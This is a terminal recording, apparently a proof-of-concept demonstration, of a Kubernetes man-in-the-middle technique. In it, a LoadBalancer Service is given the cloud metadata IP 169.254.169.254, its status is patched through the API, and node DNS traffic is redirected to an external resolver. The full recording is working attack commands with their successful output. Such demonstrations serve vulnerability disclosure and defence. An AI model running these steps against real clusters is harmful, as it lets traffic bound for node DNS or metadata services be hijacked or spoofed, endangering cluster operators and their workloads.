{"version": 2, "width": 118, "height": 55, "timestamp": 1578178581, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.588527, "o", "$ "]
[5.019423, "o", "# Another variant sending the traffic externaly"]
[5.544274, "o", "\r\n"]
[5.561037, "o", "$ "]
[13.653341, "o", "kubectl apply -f - <<'EOF'\r\n"]
[13.653849, "o", "> "]
[13.654196, "o", "apiVersion: v1\r\n> "]
[13.654843, "o", "kind: Namespace\r\n> metadata:\r\n> "]
[13.655352, "o", "  name: kubeproxy-mitm\r\n"]
[13.655731, "o", "> ---\r\n"]
[13.656237, "o", "> apiVersion: v1\r\n> "]
[13.656721, "o", "kind: Service\r\n> "]
[13.656869, "o", "metadata:\r\n"]
[13.657417, "o", "> "]
[13.657829, "o", "  name: mitm-external-lb-dns\r\n"]
[13.658176, "o", "> "]
[13.658519, "o", "  namespace: kubeproxy-mitm\r\n"]
[13.658848, "o", "> spec:\r\n"]
[13.659238, "o", ">   ports:\r\n"]
[13.65938, "o", "> "]
[13.659682, "o", "  - name: dnsu\r\n"]
[13.66001, "o", ">     port: 53\r\n"]
[13.660328, "o", "> "]
[13.66071, "o", "    targetPort: 53\r\n> "]
[13.661083, "o", "    protocol: UDP\r\n"]
[13.661503, "o", ">   type: LoadBalancer\r\n"]
[13.662355, "o", ">   loadBalancerIP: 169.254.169.254\r\n"]
[13.662896, "o", "> ---\r\n> "]
[13.663255, "o", "apiVersion: v1\r\n"]
[13.663637, "o", "> kind: Endpoints\r\n"]
[13.665123, "o", "> metadata:\r\n>   name: mitm-external-lb-dns\r\n> "]
[13.665759, "o", "  namespace: kubeproxy-mitm\r\n> subsets:\r\n"]
[13.665879, "o", "> "]
[13.666645, "o", "- addresses:\r\n>   - ip: 1.1.1.1\r\n"]
[13.666933, "o", "> "]
[13.667107, "o", "  ports:\r\n"]
[13.667396, "o", "> "]
[13.667491, "o", "  - name: dnsu\r\n"]
[13.667792, "o", "> "]
[13.668026, "o", "    port: 53"]
[13.668254, "o", "\r\n"]
[13.668386, "o", "> "]
[13.668713, "o", "    protocol: UDP\r\n"]
[13.668921, "o", "> "]
[13.669022, "o", "EOF\r\n"]
[16.535538, "o", "namespace/kubeproxy-mitm created\r\n"]
[16.868911, "o", "service/mitm-external-lb-dns created\r\n"]
[17.146728, "o", "endpoints/mitm-external-lb-dns created\r\n"]
[17.174615, "o", "$ "]
[18.694726, "o", "\r\n"]
[18.711891, "o", "$ "]
[24.218174, "o", "kubectl proxy --port=8080 &\r\n"]
[24.21955, "o", "[1] 291303\r\n"]
[24.240892, "o", "$ sleep 3\r\n"]
[24.331796, "o", "Starting to serve on 127.0.0.1:8080\r\n"]
[27.26281, "o", "$ "]
[27.266, "o", "curl -k -v -XPATCH  -H \"Accept: application/json\" -H \"Content-Type: application/merge-patch+json\" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status' -d '{\"status\":{\"loadBalancer\":{\"ingress\":[{\"ip\":\"169.254.169.254\"}]}}}'\r\n"]
[27.30892, "o", "*   Trying 127.0.0.1:8080...\r\n* TCP_NODELAY set\r\n"]
[27.309561, "o", "* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\r\n> PATCH /api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status HTTP/1.1\r\r\n> Host: 127.0.0.1:8080\r\r\n> User-Agent: curl/7.66.0\r\r\n> Accept: application/json\r\r\n> "]
[27.309993, "o", "Content-Type: application/merge-patch+json\r"]
[27.310552, "o", "\r\n> Content-Length: 66\r\r\n> \r\r\n* upload completely sent off: 66 out of 66 bytes\r\n"]
[27.60605, "o", "* Mark bundle as not supporting multiuse\r\n< HTTP/1.1 200 OK\r\r\n< Audit-Id: 603007e6-0878-47e5-903d-23d42f953d3f\r\r\n< Content-Length: 1311\r\r\n< Content-Type: application/json\r\r\n"]
[27.606447, "o", "< Date: Sat, 04 Jan 2020 22:56:49 GMT\r\r\n< \r\r\n{\r\n  \"kind\": \"Service\",\r\n  \"apiVersion\": \"v1\",\r\n  \"metadata\": {\r\n    \"name\": \"mitm-external-lb-dns\",\r\n    \"namespace\": \"kubeproxy-mitm\",\r\n    \"selfLink\": \"/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status\",\r\n    \"uid\": \"cd45832b-4329-4448-ab17-0e5617e46c65\",\r\n    \"resourceVersion\": \"26991\",\r\n    \"creationTimestamp\": \"2020-01-04T22:56:38Z\",\r\n    \"annotations\": {\r\n      \"kubectl.kubernetes.io/last-applied-configuration\": \"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"mitm-external-lb-dns\\\",\\\"namespace\\\":\\\"kubeproxy-mitm\\\"},\\\"spec\\\":{\\\"loadBalancerIP\\\":\\\"169.254.169.254\\\",\\\"ports\\\":[{\\\"name\\\":\\\"dnsu\\\",\\\"port\\\":53,\\\"protocol\\\":\\\"UDP\\\",\\\"targetPort\\\":53}],\\\"type\\\":\\\"LoadBalancer\\\"}}\\n\"\r\n    },\r\n    \"finalizers\": [\r\n      \"service.kubernetes.io/load-balancer-cleanup\"\r\n    ]\r\n  },\r\n  \"spec\": {\r\n    \"ports\": [\r\n      {\r\n        \"name\": \"dnsu\",\r\n        \"protocol\": \"UDP\",\r\n        \"port\": 53,\r\n        \"targetPor"]
[27.606575, "o", "t\": 53,\r\n        \"nodePort\": 32736\r\n      }\r\n    ],\r\n    \"clusterIP\": \"10.23.245.184\",\r\n    \"type\": \"LoadBalancer\",\r\n    \"sessionAffinity\": \"None\",\r\n    \"loadBalancerIP\": \"169.254.169.254\",\r\n    \"externalTrafficPolicy\": \"Cluster\"\r\n  },\r\n  \"status\": {\r\n    \"loadBalancer\": {\r\n      \"ingress\": [\r\n        {\r\n          \"ip\": \"169.254.169.254\"\r\n        }\r\n      ]\r\n    }\r\n  }\r\n* Connection #0 to host 127.0.0.1 left intact\r\n}"]
[27.625207, "o", "$ pkill kubectl\r\n"]
[27.667831, "o", "[1]+  Complété              kubectl proxy --port=8080\r\n"]
[27.668247, "o", "$ "]
[38.463495, "o", "\r\n"]
[38.474356, "o", "$ "]
[39.279143, "o", "kubectl get -n kubeproxy-mitm service/mitm-external-lb-dns"]
[39.647476, "o", "\r\n"]
[39.963021, "o", "NAME                   TYPE"]
[39.963115, "o", "           CLUSTER-IP      EXTERNAL-IP       PORT(S)        AGE\r\nmitm-external-lb-dns   LoadBalancer   10.23.245.184   169.254.169.254   53:32736/UDP   23s\r\n"]
[39.974855, "o", "$ "]
[43.000486, "o", "\r\n"]
[43.036499, "o", "$ "]
[53.518157, "o", "kubectl exec dig-pod -- dig CH TXT version.server"]
[54.136689, "o", "\r\n"]
[55.234932, "o", "\r\n; <<>> DiG 9.10.2 <<>> CH TXT version.server\r\n;; global options: +cmd\r\n"]
[55.23552, "o", ";; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14216\r\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 1452\r\n;; QUESTION SECTION:\r\n;version.server.\t\t\tCH\tTXT\r\n\r\n;; ANSWER SECTION:\r\nversion.server.\t\t0\tCH\tTXT\t\"cloudflare-resolver-2019.11.0\"\r\n\r\n;; Query time: 12 msec\r\n;; SERVER: 10.23.240.10#53(10.23.240.10)\r\n;; WHEN: Sat Jan 04 22:57:16 UTC 2020\r\n;; MSG SIZE  rcvd: 85\r\n\r\n"]
[55.289271, "o", "$ "]
[56.171941, "o", "\r\n"]
[56.18879, "o", "$ "]
[56.475113, "o", "\r\n"]
[56.484451, "o", "$ "]
[66.455492, "o", "kubectl exec dig-node -- dig CH TXT version.server"]
[67.031597, "o", "\r\n"]
[109.783741, "o", "\r\n; <<>> DiG 9.10.2 <<>> CH TXT version.server\r\n;; global options: +cmd\r\n;; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32155\r\n;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 1452\r\n;; QUESTION SECTION:\r\n;version.server.\t\t\tCH\tTXT\r\n\r\n;; ANSWER SECTION:\r\nversion.server.\t\t0\tCH\tTXT\t\"cloudflare-resolver-2019.11.0\"\r\n\r\n;; Query time: 11 msec\r\n;; SERVER: 169.254.169.254#53(169.254.169.254)\r\n;; WHEN: Sat Jan 04 22:58:11 UTC 2020\r\n;; MSG SIZE  rcvd: 85\r\n\r\n"]
[109.842347, "o", "$ "]
[118.500426, "o", "exit\r\n"]
